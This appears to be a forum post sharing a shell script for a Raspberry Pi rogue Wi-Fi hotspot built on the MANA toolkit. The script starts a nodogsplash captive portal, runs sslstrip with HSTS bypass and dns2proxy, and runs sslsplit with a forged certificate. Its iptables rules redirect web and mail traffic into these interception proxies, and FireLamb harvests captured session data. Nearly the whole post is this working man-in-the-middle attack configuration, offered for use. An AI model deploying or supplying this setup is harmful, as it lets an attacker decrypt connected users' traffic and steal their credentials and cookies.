zakvuil


  1. Hi guys, I've got a Pi up and running with the complete setup using mana and nodogsplash and a portal. There's a trick to using nodogsplash and redirecting SSL traffic using sslsplitter, because nodogsplash modifies the rulebase of iptables. Check out the modified config:

     ```bash
     . . .
     #Starting Portal
     echo Starting Portal
     service apache2 start
     nodogsplash -f -c ~/mana/run-mana/spot/nodogsplash-portal.conf &
     sleep 5

     #SSLStrip with HSTS bypass
     cd /usr/share/mana-toolkit/sslstrip-hsts/
     python sslstrip.py -l 10080 -a -w /var/www/portals/spot/logs/sslstrip/sslstrip.log&
     python dns2proxy.py $phy&
     cd -

     #SSLSplit
     sslsplit -D -Z -S /var/lib/mana-toolkit/sslsplit -c /var/www/portals/spot/cert/spot-secure.crt -k /var/www/portals/spot/cert/spot-secure.key -O -l /var/www/portals/spot/logs/sslsplit/sslsplit-connect.log \
      https 0.0.0.0 10443 \
      ssl 0.0.0.0 10993 \
      tcp 0.0.0.0 10143 \
      ssl 0.0.0.0 10995 \
      tcp 0.0.0.0 10110 \
      ssl 0.0.0.0 10465 \
      tcp 0.0.0.0 10025&

     iptables -t nat -D PREROUTING 1
     iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 80 -m mark --mark 0x400/0x700 -j REDIRECT --to-port 10080
     iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 443 -m mark --mark 0x400/0x700 -j REDIRECT --to-port 10443
     iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 143 -m mark --mark 0x400/0x700 -j REDIRECT --to-port 10143
     iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 993 -m mark --mark 0x400/0x700 -j REDIRECT --to-port 10993
     iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 465 -m mark --mark 0x400/0x700 -j REDIRECT --to-port 10465
     iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 25 -m mark --mark 0x400/0x700 -j REDIRECT --to-port 10025
     iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 995 -m mark --mark 0x400/0x700 -j REDIRECT --to-port 10995
     iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 110 -m mark --mark 0x400/0x700 -j REDIRECT --to-port 10110
     iptables -t nat -A PREROUTING -i $phy -m mark --mark 0x200/0x700 -j ACCEPT
     iptables -t nat -A PREROUTING -i $phy -m mark --mark 0x400/0x700 -j ACCEPT
     iptables -t nat -A PREROUTING -i $phy -d 0.0.0.0/0 -p tcp --dport 53 -j ACCEPT
     iptables -t nat -A PREROUTING -i $phy -d 0.0.0.0/0 -p udp --dport 53 -j ACCEPT
     iptables -t nat -A PREROUTING -i $phy -d 10.0.0.1 -p tcp --dport 80 -j ACCEPT
     iptables -t nat -A PREROUTING -i $phy -p tcp --dport 80 -j DNAT --to-destination 10.0.0.1:2050
     iptables -t nat -A PREROUTING -i $phy -j ACCEPT

     # Start FireLamb
     ~/mana/run-mana/spot/firelamb.py -i wlan0 -t /var/www/portals/spot/logs/sslsplit/ -s /var/www/portals/spot/logs/sslspl/sslsplit-connect.log&

     echo "Hit enter to kill me"
     read
     . . .
     ```